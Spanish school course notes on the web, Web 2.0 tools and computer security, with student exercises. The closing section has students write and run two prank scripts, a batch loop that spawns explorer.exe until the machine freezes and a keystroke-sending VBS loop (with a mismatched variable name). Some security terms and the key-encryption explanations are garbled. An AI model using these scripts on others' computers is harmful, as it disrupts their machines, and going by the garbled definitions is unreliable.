TEMA5: WWW. SEGURIDAD.


INTRODUCCIÓN:

El uso de Internet para actividades como el comercio electrónico, la investigación académica y las redes sociales puede plantear cuestiones éticas y tener impactos sociales positivos o negativos. Entre ellos están el acceso a materiales no deseados, la intimidación cibernética, el fraude electrónico, la mejora de las comunicaciones entre personas y grupos, el robo de propiedad intelectual, el plagio, el bombardeo publicitario (spamming) y la difusión global de ideas.


INTERNET:
  • DEFINICIÓN: Internet es una red mundial de ordenadores, descentralizada, que permite que multitud de ordenadores se conecten entre sí mediante una serie de protocolos de comunicación, por medio de cables de cobre, cables de fibra óptica, conexiones inalámbricas y otros medios.
  • TÉRMINOS CLAVE:  FTP, HHP, HTMLS, WWW, URL, ISP, DNS, URL, Navegador, PlugIn, PHP, java, Web 2.0 y 3.0. wikis, RSS, foros, comercio electrónico, etc.

SERVICIOS:
  • WWW:  Navegación en páginas web (WWW, World Wide Web), un sistema de documentos o archivos enlazados que se pueden visualizar por medio de un navegador (browser).
  • EMAIL: Correo electrónico (e-mail), que permite el envío de mensajes entre usuarios.
  • NEWS, CHAT, REDES SOCIALES, ..: Grupos de noticias (news), foros, mensajería instantánea (chat), etc., que son espacios de debate e intercambio de experiencias.Comunicación por medio de voz (voz sobre IP, VoIP) o de videoconferencias (Skype).Radio, televisión y prensa.
  • FTP: Transferencia de archivos de forma rápida mediante FTP (file protocol transfer) e intercambio de archivos en las llamadas redes P2P (peer to peer). Otros: compras de todo tipo, acceso a las cuentas bancarias, realización de cursos a distancia,búsqueda de trabajo, matriculación en colegios y universidades, etc.
  • PÁGINAS WEB: Estática/dinámica.  Tipos (blog, corporativas, comerciales, aplicaciones como gmail, drive, etc.
  • HTML.  
  • COMERCIO ELECTRÓNICO: compras online, pagos electrónicos, banca electrónica, derechos del consumidor.  
  • PRESENTACIONES DINÁMICAS COLABORATIVAS:  prezzi, google sites, Microsoft Sway, PowToon.






APLICACIONES EN LA WEB 2.0.
1. Wiki. www.wikipedia.es . “busca una wiki distinta a esta”.
2. Bitácoras o blog:
3 Publicar fotos.
4. Banco de imagenes CNICE
5. Publicar vídeos
6. Podcast (mp3)
7. e-learning. www.uoc.es
8. Redes sociales: “crea una red social con Ning”. Enlace
9. GPS: http://www.goolzoom.com/
10. P2P(BiTorrent): enlace.
11. Aplicaciones de las TIC: científicas y sociales. La informática distribuida (Grid).
12. Servicios en línea (on-line): comercio electrónico, banca, salud, biblioteca, docs, formularios online, etc


Curiosidades:
  • Win+Ctrol+F >busca equipos LAN
  • netsetup >aistente conexión red.
  • ipconfig/all > información completa IP

ACTIVIDADES Nº1:
1. Define el término Podcast.
2. Describe las características del término E-learning.
3. Describe la "advertencia sobre derechos de autor" de Wikipedia, que podrás encontrar en la zona de pruebas.
4. Averigua qué tipo de licencia utiliza para las imágenes publicadas en Flickr y para los vídeos en YouTube.
5. Accede a la sección RSS de tu períodico preferido y busca como has de proceder para recibir las noticias "tecnológicas" en tu blog.
6. Investiga las características de las licencias del tipo Creative Commons, y explica sus diferencias respecto del tipo tradicional.
7. Enumera dos ventajas y dos inconvenientes de la Wikipedia.
8. Graba una locución tuya de unos 20 segundos, conviertelo al formato MP3 y publícalo en tu blog.
9. Utilizando Google Map, determina las coordenadas geográficas de la Alhambra de Granada y calcula la distancia (Km) que hay hasta tu instituto.
10. Averigua qué tipo de sistema de descarga utiliza el protocolo BitTorrent.
11. Averigua el significado de la plataforma de MOODLE. Pon un ejemplo respresentativo.
12. Averigua las características de las licencias de tipo Creative Commons y explica sus diferencias respecto a otras.
13. Averigua que es un Applet de Java.


ACTIVIDADES Nº2.
1.- Mediante una cámara digital, saca algunas fotos de la fachada de tu instituto y publicala en Flickr con la georreferenciación (localización geográfica de tu centro).
2.- Averigua si existe en tu comunidad la opción de estudiar el bachillerato por internet. 
3. Enumera al menos dos servicios basados en P2P, distintos a los comentados en este libro. Crea un documento en DOCS online en el que se describa su funcionamiento e indique sus ventajas e inconvenientes. Haz este trabajo de forma "colaborativa" con un compañero de tu clase, para ello,  crea en tu cuenta de correo un documento compartido con  un compañero de clase de modo que podáis editar este documento de forma COLABORATIVA.

ACTIVIDAD Nº3.

Un colegio se está planteando utilizar Internet para ofrecer más oportunidades de aprendizaje a sus
alumnos. Antes de tomar una decisión final, quiere obtener un resumen de las distintas opciones disponibles.
También debe considerar los problemas potenciales de abrir esta “ventana al mundo”.
Investiga distintos entornos para experimentar la variedad de oportunidades de aprendizaje disponibles. Esto puede implicar el uso de distintos sitios web colaborativos, sitios web educativos o fuentes de información en línea.





SEGURIDAD INFORMÁTICA:


CONCEPTO: SEGURIDAD = {CONFICENCIALIDAD+INTEGRIDAD+DISPONIBILIDAD}.

FACTORES DE RIESGOS DIGITALES:
  •  Brecha digital.
  • Alfabetización
  • Tecnoadicion
  • Delitos informáticos.
  • Amenazas digitales: ACTIVAS/PASIVAS. HUMANAS (pasivos/hackers y activos/crackers). LÓGICAS (malware), FÍSICAS (fallos, accidentes, catástrofes). 
  • OTRAS AMENAZAS: phishing, pharming, spam, hoax, spooling, fuerza bruta, inyección de código (SQL vulnerables), escaneo de puertos, denegación de servicios (satura los recursos. DoS), escuchas de red, elevación de privilegios, privacidad de datos (los SO, contraseñas, registros web visitadas, las cookies, formularios, redes sociales, bigdata,)

MEDIDAS DE SEGURIDAD:
  • ACTIVAS (controles de acceso, encriptación, antivirus, antiespías, cortafuegos, firmas digitales, protocolos, proxy, certificados SSL/HTTPS, etc. ), PASIVAS (apps de limpieza, copias de seguridad, SAI, NAS, RAID. 
  • CIFRADO (CRIPTOGRAFÍA): Ej. códificación binaria, c.hexadecimal, cifrado email, etc. 
  1. Clave simétrica: Misma clave para cifrar y descifrar el mensaje. Es más rápido pero menos segura.
  2. C. asimétrica: una clave pública y otra privada. Se encripta en la pública y se abre en la privada. Ninguna se envía. Más lento.
  3. Clave pública. Mezcla de las dos anteriores.
  • LICENCIAS DE USUARIO.
  • FIRMA ELECTRÓNICA.
  • CERTIFICADO DIGITAL.
  • NAVEGACIÓN SEGURA.
  • PROTECCIÓN EN LA RED: Cifrados WPA, filtrado MAC, audiotorías, cambiar contraseñas rooter, SSID, quitar acceso WPS etc.
  • SEGURIDAD EN LA WIFI Y EN BLUETOOTH.
     

EJEMPLOS DE MALWARE:
 1.- Escribe el siguiente código en un editor de texto plano y guárdalo con el nombre virus.bat:
 @echo off
:inicio
start explorer.exe
goto inicio
Al ejecutarlo, se abrirá el explorer.exe contantemente hasta agotar los recursos del equipo y dejarlo bloqueado.
2.- Escribe el siguient  código en un editor de texto plano y guárdalo con el nombre virus.vbs:
MsgBox "estás siendo hackeado"
Set wshShell  = 
wscript.CreateObject("WScript.Shell") do 
wscript.sleep 600
wshell.sendkeys "{bs}"
loop
Al ejecutarlo, se activa la tecla de retroceso cada cierto tiempo y por tanto el cursos tendrá distintos posicionamientos descontrolados por le usuario.



(Enlace: Email)